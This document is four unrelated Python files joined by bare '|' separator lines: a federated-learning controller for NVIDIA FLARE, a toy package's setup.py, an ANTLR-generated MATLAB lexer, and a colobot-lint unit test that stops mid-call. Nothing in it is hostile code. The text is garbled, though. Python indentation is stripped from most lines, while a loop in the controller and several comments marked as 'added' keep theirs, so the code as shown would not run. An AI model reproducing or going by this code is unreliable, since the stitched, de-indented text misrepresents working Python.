# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nvflare.apis.client import Client
from nvflare.apis.fl_context import FLContext
from nvflare.apis.impl.controller import ClientTask, Controller, Task
from nvflare.apis.shareable import Shareable
from nvflare.apis.signal import Signal
from nvflare.app_common.abstract.learnable_persistor import LearnablePersistor
from nvflare.app_common.abstract.shareable_generator import ShareableGenerator
from nvflare.app_common.app_constant import AppConstants
class CustomController(Controller):
def __init__(
self,
min_clients: int,
num_rounds: int,
persistor_id="persistor",
shareable_generator_id="shareable_generator",
):
Controller.__init__(self)
self.persistor_id = persistor_id
self.shareable_generator_id = shareable_generator_id
self.persistor = None
self.shareable_gen = None
# config data
self._min_clients = min_clients
self._num_rounds = num_rounds
# workflow phases: init, train
self._phase = "init"
self._global_model = None
def start_controller(self, fl_ctx: FLContext):
self._phase = "init"
engine = fl_ctx.get_engine()
self.shareable_gen = engine.get_component(self.shareable_generator_id)
if not isinstance(self.shareable_gen, ShareableGenerator):
self.system_panic("shareable_gen should be an instance of ShareableGenerator.", fl_ctx)
self.persistor = engine.get_component(self.persistor_id)
if not isinstance(self.persistor, LearnablePersistor):
self.system_panic("persistor should be an instance of LearnablePersistor.", fl_ctx)
self._global_model = self.persistor.load(fl_ctx)
fl_ctx.set_prop(AppConstants.GLOBAL_MODEL, self._global_model, private=True, sticky=True)
def _prepare_training_ctx(self, client_task: ClientTask, fl_ctx: FLContext):
task = client_task.task
fl_ctx.set_prop("current_round", task.props["round"], private=False)
fl_ctx.set_prop("total_rounds", task.props["total"], private=False)
def _process_training_result(self, client_task: ClientTask, fl_ctx: FLContext):
task = client_task.task
task.data = client_task.result
def process_result_of_unknown_task(
self,
client: Client,
task_name: str,
client_task_id: str,
result: Shareable,
fl_ctx: FLContext,
):
return None
def control_flow(self, abort_signal: Signal, fl_ctx: FLContext):
self._phase = "train"
engine = fl_ctx.get_engine()
        # Round-based training loop
        for r in range(self._num_rounds):
            # Stop the workflow as soon as an abort is requested.
            if abort_signal.triggered:
                return
task = Task(
name="poc",
data=self.shareable_gen.learnable_to_shareable(self._global_model, fl_ctx),
props={"round": r, "total": self._num_rounds},
timeout=0,
before_task_sent_cb=self._prepare_training_ctx,
result_received_cb=self._process_training_result,
)
client_list = engine.get_clients()
for c in client_list:
self.log_info(fl_ctx, f"@@@ client name {c.name}")
self.log_info(fl_ctx, f"@@@ Broadcast and wait {task.name}")
self.broadcast_and_wait(
task=task,
fl_ctx=fl_ctx,
targets=None,
min_responses=0,
abort_signal=abort_signal,
)
self.log_info(fl_ctx, f"@@@ Broadcast and wait - end {task.name}")
self._global_model = self.shareable_gen.shareable_to_learnable(task.data, fl_ctx)
self.persistor.save(self._global_model, fl_ctx)
self.logger.info("model saved")
def stop_controller(self, fl_ctx: FLContext):
self._phase = "finished"
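# Illustrative sketch (added; not part of the original file): a workflow like CustomController
# is typically referenced from the server app config, with the persistor and shareable
# generator registered as components under the ids passed to __init__. The module path and
# values below are assumptions for illustration only.
#
# "workflows": [
#     {
#         "id": "custom_controller",
#         "path": "my_app.custom_controller.CustomController",
#         "args": {"min_clients": 2, "num_rounds": 5}
#     }
# ]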
|
#! /usr/bin/env python
import os
import sys
import setuptools
def load_version():
"""Executes toy_pkg/version.py in a globals dictionary and return it."""
globals_dict = {}
with open(os.path.join('toy_pkg', 'version.py')) as fp:
exec(fp.read(), globals_dict)
return globals_dict
def is_installing():
# Allow command-lines such as "python setup.py build install"
install_commands = set(['install', 'develop'])
return install_commands.intersection(set(sys.argv))
def list_required_packages():
required_packages = []
required_packages_orig = ['%s>=%s' % (mod, meta['min_version'])
for mod, meta
in _VERSION_GLOBALS['REQUIRED_MODULE_METADATA']
]
for package in required_packages_orig:
if package.startswith('sklearn'):
package = package.replace('sklearn', 'scikit-learn')
required_packages.append(package)
return required_packages
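# For reference (added; hypothetical content): this setup script expects toy_pkg/version.py
# to define roughly the following names, which load_version() and list_required_packages()
# read from the executed globals:
#
# __version__ = '0.1.0'
# REQUIRED_MODULE_METADATA = [
#     ('numpy', {'min_version': '1.16'}),
#     ('sklearn', {'min_version': '0.22'}),
# ]
# def _check_module_dependencies(is_toy_pkg_installing=False):
#     ...  # verify that the modules above are importable at the required versions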
# Make sources available using relative paths from this file's directory.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
_VERSION_GLOBALS = load_version()
DISTNAME = 'toy_pkg'
DESCRIPTION = 'A small and useless example package'
with open('README.rst') as fp:
LONG_DESCRIPTION = fp.read()
MAINTAINER = 'Nicolas Gensollen'
MAINTAINER_EMAIL = 'nicolas.gensollen@gmail.com'
URL = 'http://github.com/NicolasGensollen/toy_pkg'
LICENSE = 'none'
DOWNLOAD_URL = 'http://github.com/NicolasGensollen/toy_pkg'
VERSION = _VERSION_GLOBALS['__version__']
if __name__ == "__main__":
if is_installing():
module_check_fn = _VERSION_GLOBALS['_check_module_dependencies']
module_check_fn(is_toy_pkg_installing=True)
setuptools.setup(
name=DISTNAME,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
version=VERSION,
download_url=DOWNLOAD_URL,
long_description=LONG_DESCRIPTION,
zip_safe=False,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
packages=setuptools.find_packages(),
install_requires=list_required_packages(),
python_requires='>=3.6',
)
|
# Generated from MATLABLexer.g4 by ANTLR 4.7.2
from antlr4 import *
from io import StringIO
from typing import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2>")
buf.write("\u01a4\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\3\2\3")
buf.write("\2\3\2\3\2\3\2\3\2\3\2\3\2\3\2\3\3\3\3\3\3\3\3\3\3\3\3")
buf.write("\3\3\3\3\3\3\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3")
buf.write("\4\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\6\3\6\3\6\3\6\3\7")
buf.write("\3\7\3\7\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3")
buf.write("\t\3\n\3\n\3\n\3\n\3\n\3\n\3\13\3\13\3\13\3\13\3\f\3\f")
buf.write("\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\16\3\16\3\16")
buf.write("\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20")
buf.write("\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\22\3\22\3\22\3\22")
buf.write("\3\22\3\22\3\23\3\23\3\24\3\24\3\24\3\25\3\25\3\25\3\26")
buf.write("\3\26\3\27\3\27\3\30\3\30\3\30\3\31\3\31\3\31\3\32\3\32")
buf.write("\3\33\3\33\3\34\3\34\3\35\3\35\3\36\3\36\3\37\3\37\3\37")
buf.write("\3 \3 \3 \3!\3!\3\"\3\"\3#\3#\3$\3$\3%\3%\3&\3&\3&\3\'")
buf.write("\3\'\3(\3(\3)\3)\3)\3*\3*\3*\3+\3+\3+\3,\3,\3-\3-\3.\3")
buf.write(".\3/\3/\3/\3\60\3\60\3\61\3\61\3\62\5\62\u0144\n\62\3")
buf.write("\62\3\62\3\63\3\63\3\63\3\63\3\64\3\64\5\64\u014e\n\64")
buf.write("\3\64\7\64\u0151\n\64\f\64\16\64\u0154\13\64\3\64\3\64")
buf.write("\3\64\3\64\3\65\3\65\3\66\3\66\3\67\3\67\3\67\38\68\u0162")
buf.write("\n8\r8\168\u0163\39\69\u0167\n9\r9\169\u0168\39\39\79")
buf.write("\u016d\n9\f9\169\u0170\139\39\39\69\u0174\n9\r9\169\u0175")
buf.write("\59\u0178\n9\3:\3:\5:\u017c\n:\3:\3:\3:\3;\3;\3;\3;\7")
buf.write(";\u0185\n;\f;\16;\u0188\13;\3<\3<\3<\7<\u018d\n<\f<\16")
buf.write("<\u0190\13<\3<\3<\3=\3=\3>\3>\3?\3?\3@\3@\3A\6A\u019d")
buf.write("\nA\rA\16A\u019e\3A\3A\3B\3B\4\u0152\u018e\2C\3\3\5\4")
buf.write("\7\5\t\6\13\7\r\b\17\t\21\n\23\13\25\f\27\r\31\16\33\17")
buf.write("\35\20\37\21!\22#\23%\24\'\25)\26+\27-\30/\31\61\32\63")
buf.write("\33\65\34\67\359\36;\37= ?!A\"C#E$G%I&K\'M(O)Q*S+U,W-")
buf.write("Y.[/]\60_\61a\62c\63e\2g\64i\2k\2m\2o\65q\66s\67u8w9y")
buf.write(":{;}<\177=\u0081>\u0083\2\3\2\5\4\2C\\c|\3\2\62;\4\2\13")
buf.write("\13\"\"\2\u01ad\2\3\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2")
buf.write("\t\3\2\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21")
buf.write("\3\2\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3")
buf.write("\2\2\2\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2")
buf.write("\2\2#\3\2\2\2\2%\3\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2")
buf.write("\2\2\2-\3\2\2\2\2/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2")
buf.write("\65\3\2\2\2\2\67\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2")
buf.write("\2\2\2?\3\2\2\2\2A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3")
buf.write("\2\2\2\2I\3\2\2\2\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q")
buf.write("\3\2\2\2\2S\3\2\2\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2")
buf.write("[\3\2\2\2\2]\3\2\2\2\2_\3\2\2\2\2a\3\2\2\2\2c\3\2\2\2")
buf.write("\2g\3\2\2\2\2o\3\2\2\2\2q\3\2\2\2\2s\3\2\2\2\2u\3\2\2")
buf.write("\2\2w\3\2\2\2\2y\3\2\2\2\2{\3\2\2\2\2}\3\2\2\2\2\177\3")
buf.write("\2\2\2\2\u0081\3\2\2\2\3\u0085\3\2\2\2\5\u008e\3\2\2\2")
buf.write("\7\u0097\3\2\2\2\t\u00a2\3\2\2\2\13\u00aa\3\2\2\2\r\u00ae")
buf.write("\3\2\2\2\17\u00b1\3\2\2\2\21\u00b8\3\2\2\2\23\u00bd\3")
buf.write("\2\2\2\25\u00c3\3\2\2\2\27\u00c7\3\2\2\2\31\u00ce\3\2")
buf.write("\2\2\33\u00d3\3\2\2\2\35\u00dd\3\2\2\2\37\u00e3\3\2\2")
buf.write("\2!\u00ec\3\2\2\2#\u00f3\3\2\2\2%\u00f9\3\2\2\2\'\u00fb")
buf.write("\3\2\2\2)\u00fe\3\2\2\2+\u0101\3\2\2\2-\u0103\3\2\2\2")
buf.write("/\u0105\3\2\2\2\61\u0108\3\2\2\2\63\u010b\3\2\2\2\65\u010d")
buf.write("\3\2\2\2\67\u010f\3\2\2\29\u0111\3\2\2\2;\u0113\3\2\2")
buf.write("\2=\u0115\3\2\2\2?\u0118\3\2\2\2A\u011b\3\2\2\2C\u011d")
buf.write("\3\2\2\2E\u011f\3\2\2\2G\u0121\3\2\2\2I\u0123\3\2\2\2")
buf.write("K\u0125\3\2\2\2M\u0128\3\2\2\2O\u012a\3\2\2\2Q\u012c\3")
buf.write("\2\2\2S\u012f\3\2\2\2U\u0132\3\2\2\2W\u0135\3\2\2\2Y\u0137")
buf.write("\3\2\2\2[\u0139\3\2\2\2]\u013b\3\2\2\2_\u013e\3\2\2\2")
buf.write("a\u0140\3\2\2\2c\u0143\3\2\2\2e\u0147\3\2\2\2g\u014d\3")
buf.write("\2\2\2i\u0159\3\2\2\2k\u015b\3\2\2\2m\u015d\3\2\2\2o\u0161")
buf.write("\3\2\2\2q\u0177\3\2\2\2s\u017b\3\2\2\2u\u0180\3\2\2\2")
buf.write("w\u0189\3\2\2\2y\u0193\3\2\2\2{\u0195\3\2\2\2}\u0197\3")
buf.write("\2\2\2\177\u0199\3\2\2\2\u0081\u019c\3\2\2\2\u0083\u01a2")
buf.write("\3\2\2\2\u0085\u0086\7h\2\2\u0086\u0087\7w\2\2\u0087\u0088")
buf.write("\7p\2\2\u0088\u0089\7e\2\2\u0089\u008a\7v\2\2\u008a\u008b")
buf.write("\7k\2\2\u008b\u008c\7q\2\2\u008c\u008d\7p\2\2\u008d\4")
buf.write("\3\2\2\2\u008e\u008f\7e\2\2\u008f\u0090\7n\2\2\u0090\u0091")
buf.write("\7c\2\2\u0091\u0092\7u\2\2\u0092\u0093\7u\2\2\u0093\u0094")
buf.write("\7f\2\2\u0094\u0095\7g\2\2\u0095\u0096\7h\2\2\u0096\6")
buf.write("\3\2\2\2\u0097\u0098\7r\2\2\u0098\u0099\7t\2\2\u0099\u009a")
buf.write("\7q\2\2\u009a\u009b\7r\2\2\u009b\u009c\7g\2\2\u009c\u009d")
buf.write("\7t\2\2\u009d\u009e\7v\2\2\u009e\u009f\7k\2\2\u009f\u00a0")
buf.write("\7g\2\2\u00a0\u00a1\7u\2\2\u00a1\b\3\2\2\2\u00a2\u00a3")
buf.write("\7o\2\2\u00a3\u00a4\7g\2\2\u00a4\u00a5\7v\2\2\u00a5\u00a6")
buf.write("\7j\2\2\u00a6\u00a7\7q\2\2\u00a7\u00a8\7f\2\2\u00a8\u00a9")
buf.write("\7u\2\2\u00a9\n\3\2\2\2\u00aa\u00ab\7g\2\2\u00ab\u00ac")
buf.write("\7p\2\2\u00ac\u00ad\7f\2\2\u00ad\f\3\2\2\2\u00ae\u00af")
buf.write("\7k\2\2\u00af\u00b0\7h\2\2\u00b0\16\3\2\2\2\u00b1\u00b2")
buf.write("\7g\2\2\u00b2\u00b3\7n\2\2\u00b3\u00b4\7u\2\2\u00b4\u00b5")
buf.write("\7g\2\2\u00b5\u00b6\7k\2\2\u00b6\u00b7\7h\2\2\u00b7\20")
buf.write("\3\2\2\2\u00b8\u00b9\7g\2\2\u00b9\u00ba\7n\2\2\u00ba\u00bb")
buf.write("\7u\2\2\u00bb\u00bc\7g\2\2\u00bc\22\3\2\2\2\u00bd\u00be")
buf.write("\7y\2\2\u00be\u00bf\7j\2\2\u00bf\u00c0\7k\2\2\u00c0\u00c1")
buf.write("\7n\2\2\u00c1\u00c2\7g\2\2\u00c2\24\3\2\2\2\u00c3\u00c4")
buf.write("\7h\2\2\u00c4\u00c5\7q\2\2\u00c5\u00c6\7t\2\2\u00c6\26")
buf.write("\3\2\2\2\u00c7\u00c8\7u\2\2\u00c8\u00c9\7y\2\2\u00c9\u00ca")
buf.write("\7k\2\2\u00ca\u00cb\7v\2\2\u00cb\u00cc\7e\2\2\u00cc\u00cd")
buf.write("\7j\2\2\u00cd\30\3\2\2\2\u00ce\u00cf\7e\2\2\u00cf\u00d0")
buf.write("\7c\2\2\u00d0\u00d1\7u\2\2\u00d1\u00d2\7g\2\2\u00d2\32")
buf.write("\3\2\2\2\u00d3\u00d4\7q\2\2\u00d4\u00d5\7v\2\2\u00d5\u00d6")
buf.write("\7j\2\2\u00d6\u00d7\7g\2\2\u00d7\u00d8\7t\2\2\u00d8\u00d9")
buf.write("\7y\2\2\u00d9\u00da\7k\2\2\u00da\u00db\7u\2\2\u00db\u00dc")
buf.write("\7g\2\2\u00dc\34\3\2\2\2\u00dd\u00de\7d\2\2\u00de\u00df")
buf.write("\7t\2\2\u00df\u00e0\7g\2\2\u00e0\u00e1\7c\2\2\u00e1\u00e2")
buf.write("\7m\2\2\u00e2\36\3\2\2\2\u00e3\u00e4\7e\2\2\u00e4\u00e5")
buf.write("\7q\2\2\u00e5\u00e6\7p\2\2\u00e6\u00e7\7v\2\2\u00e7\u00e8")
buf.write("\7k\2\2\u00e8\u00e9\7p\2\2\u00e9\u00ea\7w\2\2\u00ea\u00eb")
buf.write("\7g\2\2\u00eb \3\2\2\2\u00ec\u00ed\7t\2\2\u00ed\u00ee")
buf.write("\7g\2\2\u00ee\u00ef\7v\2\2\u00ef\u00f0\7w\2\2\u00f0\u00f1")
buf.write("\7t\2\2\u00f1\u00f2\7p\2\2\u00f2\"\3\2\2\2\u00f3\u00f4")
buf.write("\7e\2\2\u00f4\u00f5\7n\2\2\u00f5\u00f6\7g\2\2\u00f6\u00f7")
buf.write("\7c\2\2\u00f7\u00f8\7t\2\2\u00f8$\3\2\2\2\u00f9\u00fa")
buf.write("\7?\2\2\u00fa&\3\2\2\2\u00fb\u00fc\7?\2\2\u00fc\u00fd")
buf.write("\7?\2\2\u00fd(\3\2\2\2\u00fe\u00ff\7\u0080\2\2\u00ff\u0100")
buf.write("\7?\2\2\u0100*\3\2\2\2\u0101\u0102\7@\2\2\u0102,\3\2\2")
buf.write("\2\u0103\u0104\7>\2\2\u0104.\3\2\2\2\u0105\u0106\7@\2")
buf.write("\2\u0106\u0107\7?\2\2\u0107\60\3\2\2\2\u0108\u0109\7>")
buf.write("\2\2\u0109\u010a\7?\2\2\u010a\62\3\2\2\2\u010b\u010c\7")
buf.write("-\2\2\u010c\64\3\2\2\2\u010d\u010e\7/\2\2\u010e\66\3\2")
buf.write("\2\2\u010f\u0110\7\60\2\2\u01108\3\2\2\2\u0111\u0112\7")
buf.write("(\2\2\u0112:\3\2\2\2\u0113\u0114\7~\2\2\u0114<\3\2\2\2")
buf.write("\u0115\u0116\7(\2\2\u0116\u0117\7(\2\2\u0117>\3\2\2\2")
buf.write("\u0118\u0119\7~\2\2\u0119\u011a\7~\2\2\u011a@\3\2\2\2")
buf.write("\u011b\u011c\7*\2\2\u011cB\3\2\2\2\u011d\u011e\7+\2\2")
buf.write("\u011eD\3\2\2\2\u011f\u0120\7}\2\2\u0120F\3\2\2\2\u0121")
buf.write("\u0122\7]\2\2\u0122H\3\2\2\2\u0123\u0124\7,\2\2\u0124")
buf.write("J\3\2\2\2\u0125\u0126\7\60\2\2\u0126\u0127\7,\2\2\u0127")
buf.write("L\3\2\2\2\u0128\u0129\7\61\2\2\u0129N\3\2\2\2\u012a\u012b")
buf.write("\7^\2\2\u012bP\3\2\2\2\u012c\u012d\7\60\2\2\u012d\u012e")
buf.write("\7\61\2\2\u012eR\3\2\2\2\u012f\u0130\7\60\2\2\u0130\u0131")
buf.write("\7^\2\2\u0131T\3\2\2\2\u0132\u0133\7\60\2\2\u0133\u0134")
buf.write("\7`\2\2\u0134V\3\2\2\2\u0135\u0136\7`\2\2\u0136X\3\2\2")
buf.write("\2\u0137\u0138\7\u0080\2\2\u0138Z\3\2\2\2\u0139\u013a")
buf.write("\7<\2\2\u013a\\\3\2\2\2\u013b\u013c\7\60\2\2\u013c\u013d")
buf.write("\7)\2\2\u013d^\3\2\2\2\u013e\u013f\7)\2\2\u013f`\3\2\2")
buf.write("\2\u0140\u0141\7B\2\2\u0141b\3\2\2\2\u0142\u0144\7\17")
buf.write("\2\2\u0143\u0142\3\2\2\2\u0143\u0144\3\2\2\2\u0144\u0145")
buf.write("\3\2\2\2\u0145\u0146\7\f\2\2\u0146d\3\2\2\2\u0147\u0148")
buf.write("\7\60\2\2\u0148\u0149\7\60\2\2\u0149\u014a\7\60\2\2\u014a")
buf.write("f\3\2\2\2\u014b\u014e\7\'\2\2\u014c\u014e\5e\63\2\u014d")
buf.write("\u014b\3\2\2\2\u014d\u014c\3\2\2\2\u014e\u0152\3\2\2\2")
buf.write("\u014f\u0151\13\2\2\2\u0150\u014f\3\2\2\2\u0151\u0154")
buf.write("\3\2\2\2\u0152\u0153\3\2\2\2\u0152\u0150\3\2\2\2\u0153")
buf.write("\u0155\3\2\2\2\u0154\u0152\3\2\2\2\u0155\u0156\5c\62\2")
buf.write("\u0156\u0157\3\2\2\2\u0157\u0158\b\64\2\2\u0158h\3\2\2")
buf.write("\2\u0159\u015a\t\2\2\2\u015aj\3\2\2\2\u015b\u015c\t\3")
buf.write("\2\2\u015cl\3\2\2\2\u015d\u015e\7)\2\2\u015e\u015f\7)")
buf.write("\2\2\u015fn\3\2\2\2\u0160\u0162\5k\66\2\u0161\u0160\3")
buf.write("\2\2\2\u0162\u0163\3\2\2\2\u0163\u0161\3\2\2\2\u0163\u0164")
buf.write("\3\2\2\2\u0164p\3\2\2\2\u0165\u0167\5k\66\2\u0166\u0165")
buf.write("\3\2\2\2\u0167\u0168\3\2\2\2\u0168\u0166\3\2\2\2\u0168")
buf.write("\u0169\3\2\2\2\u0169\u016a\3\2\2\2\u016a\u016e\7\60\2")
buf.write("\2\u016b\u016d\5k\66\2\u016c\u016b\3\2\2\2\u016d\u0170")
buf.write("\3\2\2\2\u016e\u016c\3\2\2\2\u016e\u016f\3\2\2\2\u016f")
buf.write("\u0178\3\2\2\2\u0170\u016e\3\2\2\2\u0171\u0173\7\60\2")
buf.write("\2\u0172\u0174\5k\66\2\u0173\u0172\3\2\2\2\u0174\u0175")
buf.write("\3\2\2\2\u0175\u0173\3\2\2\2\u0175\u0176\3\2\2\2\u0176")
buf.write("\u0178\3\2\2\2\u0177\u0166\3\2\2\2\u0177\u0171\3\2\2\2")
buf.write("\u0178r\3\2\2\2\u0179\u017c\5o8\2\u017a\u017c\5q9\2\u017b")
buf.write("\u0179\3\2\2\2\u017b\u017a\3\2\2\2\u017c\u017d\3\2\2\2")
buf.write("\u017d\u017e\7g\2\2\u017e\u017f\5o8\2\u017ft\3\2\2\2\u0180")
buf.write("\u0186\5i\65\2\u0181\u0185\5i\65\2\u0182\u0185\5k\66\2")
buf.write("\u0183\u0185\7a\2\2\u0184\u0181\3\2\2\2\u0184\u0182\3")
buf.write("\2\2\2\u0184\u0183\3\2\2\2\u0185\u0188\3\2\2\2\u0186\u0184")
buf.write("\3\2\2\2\u0186\u0187\3\2\2\2\u0187v\3\2\2\2\u0188\u0186")
buf.write("\3\2\2\2\u0189\u018e\7)\2\2\u018a\u018d\5m\67\2\u018b")
buf.write("\u018d\13\2\2\2\u018c\u018a\3\2\2\2\u018c\u018b\3\2\2")
buf.write("\2\u018d\u0190\3\2\2\2\u018e\u018f\3\2\2\2\u018e\u018c")
buf.write("\3\2\2\2\u018f\u0191\3\2\2\2\u0190\u018e\3\2\2\2\u0191")
buf.write("\u0192\7)\2\2\u0192x\3\2\2\2\u0193\u0194\7_\2\2\u0194")
buf.write("z\3\2\2\2\u0195\u0196\7\177\2\2\u0196|\3\2\2\2\u0197\u0198")
buf.write("\7.\2\2\u0198~\3\2\2\2\u0199\u019a\7=\2\2\u019a\u0080")
buf.write("\3\2\2\2\u019b\u019d\5\u0083B\2\u019c\u019b\3\2\2\2\u019d")
buf.write("\u019e\3\2\2\2\u019e\u019c\3\2\2\2\u019e\u019f\3\2\2\2")
buf.write("\u019f\u01a0\3\2\2\2\u01a0\u01a1\bA\2\2\u01a1\u0082\3")
buf.write("\2\2\2\u01a2\u01a3\t\4\2\2\u01a3\u0084\3\2\2\2\21\2\u0143")
buf.write("\u014d\u0152\u0163\u0168\u016e\u0175\u0177\u017b\u0184")
buf.write("\u0186\u018c\u018e\u019e\3\b\2\2")
return buf.getvalue()
class MATLABLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
FUNCTION = 1
CLASSDEF = 2
PROPERTIES = 3
METHODS = 4
END = 5
IF = 6
ELSEIF = 7
ELSE = 8
WHILE = 9
FOR = 10
SWITCH = 11
CASE = 12
OTHERWISE = 13
BREAK = 14
CONTINUE = 15
RETURN = 16
CLEAR = 17
EQUALS = 18
EQUALTO = 19
NOTEQUALTO = 20
GT = 21
LT = 22
GE = 23
LE = 24
PLUS = 25
MINUS = 26
DOT = 27
VECAND = 28
VECOR = 29
SCALAND = 30
SCALOR = 31
LPAREN = 32
RPAREN = 33
LBRACE = 34
LBRACK = 35
MTIMES = 36
TIMES = 37
RDIVIDE = 38
LDIVIDE = 39
MRDIVIDE = 40
MLDIVIDE = 41
POW = 42
MPOW = 43
NOT = 44
COLON = 45
TRANS = 46
CTRANS = 47
FUNC_HANDLE = 48
NL = 49
COMMENT = 50
INT = 51
FLOAT = 52
SCI = 53
ID = 54
STRING = 55
RBRACK = 56
RBRACE = 57
COMMA = 58
SEMI = 59
WS = 60
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"'function'", "'classdef'", "'properties'", "'methods'", "'end'",
"'if'", "'elseif'", "'else'", "'while'", "'for'", "'switch'",
"'case'", "'otherwise'", "'break'", "'continue'", "'return'",
"'clear'", "'='", "'=='", "'~='", "'>'", "'<'", "'>='", "'<='",
"'+'", "'-'", "'.'", "'&'", "'|'", "'&&'", "'||'", "'('", "')'",
"'{'", "'['", "'*'", "'.*'", "'/'", "'\\'", "'./'", "'.\\'",
"'.^'", "'^'", "'~'", "':'", "'.''", "'''", "'@'", "']'", "'}'",
"','", "';'" ]
symbolicNames = [ "<INVALID>",
"FUNCTION", "CLASSDEF", "PROPERTIES", "METHODS", "END", "IF",
"ELSEIF", "ELSE", "WHILE", "FOR", "SWITCH", "CASE", "OTHERWISE",
"BREAK", "CONTINUE", "RETURN", "CLEAR", "EQUALS", "EQUALTO",
"NOTEQUALTO", "GT", "LT", "GE", "LE", "PLUS", "MINUS", "DOT",
"VECAND", "VECOR", "SCALAND", "SCALOR", "LPAREN", "RPAREN",
"LBRACE", "LBRACK", "MTIMES", "TIMES", "RDIVIDE", "LDIVIDE",
"MRDIVIDE", "MLDIVIDE", "POW", "MPOW", "NOT", "COLON", "TRANS",
"CTRANS", "FUNC_HANDLE", "NL", "COMMENT", "INT", "FLOAT", "SCI",
"ID", "STRING", "RBRACK", "RBRACE", "COMMA", "SEMI", "WS" ]
ruleNames = [ "FUNCTION", "CLASSDEF", "PROPERTIES", "METHODS", "END",
"IF", "ELSEIF", "ELSE", "WHILE", "FOR", "SWITCH", "CASE",
"OTHERWISE", "BREAK", "CONTINUE", "RETURN", "CLEAR", "EQUALS",
"EQUALTO", "NOTEQUALTO", "GT", "LT", "GE", "LE", "PLUS",
"MINUS", "DOT", "VECAND", "VECOR", "SCALAND", "SCALOR",
"LPAREN", "RPAREN", "LBRACE", "LBRACK", "MTIMES", "TIMES",
"RDIVIDE", "LDIVIDE", "MRDIVIDE", "MLDIVIDE", "POW", "MPOW",
"NOT", "COLON", "TRANS", "CTRANS", "FUNC_HANDLE", "NL",
"LINECONTINUE", "COMMENT", "LETTER", "DIGIT", "ESC", "INT",
"FLOAT", "SCI", "ID", "STRING", "RBRACK", "RBRACE", "COMMA",
"SEMI", "WS", "SPACE" ]
grammarFileName = "MATLABLexer.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.7.2")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
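# Minimal usage sketch (added; not part of the ANTLR-generated file). It assumes the antlr4
# Python runtime is installed and simply prints the tokens recognized in a small MATLAB snippet.
if __name__ == "__main__":
    from antlr4 import InputStream, CommonTokenStream
    from antlr4.Token import Token

    lexer = MATLABLexer(InputStream("x = 1 + 2;\n"))
    stream = CommonTokenStream(lexer)
    stream.fill()
    for tok in stream.tokens:
        if tok.type == Token.EOF:
            continue
        # symbolicNames is indexed by token type; index 0 is "<INVALID>".
        print(MATLABLexer.symbolicNames[tok.type], repr(tok.text))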
|
import test_support
class InconsistentDeclarationParameterNameRuleTest(test_support.TestBase):
def setUp(self):
self.set_default_rules_selection(['InconsistentDeclarationParameterNameRule'])
self.set_default_error_id('inconsistent declaration parameter name')
self.set_default_error_severity('style')
def test_only_function_declaration(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c);'
],
expected_errors = [])
def test_only_function_definition(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c) {}'
],
expected_errors = [])
def test_function_declaration_with_empty_parameter_names_and_function_definition(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int, int, int);',
'void Foo(int a, int b, int c) {}'
],
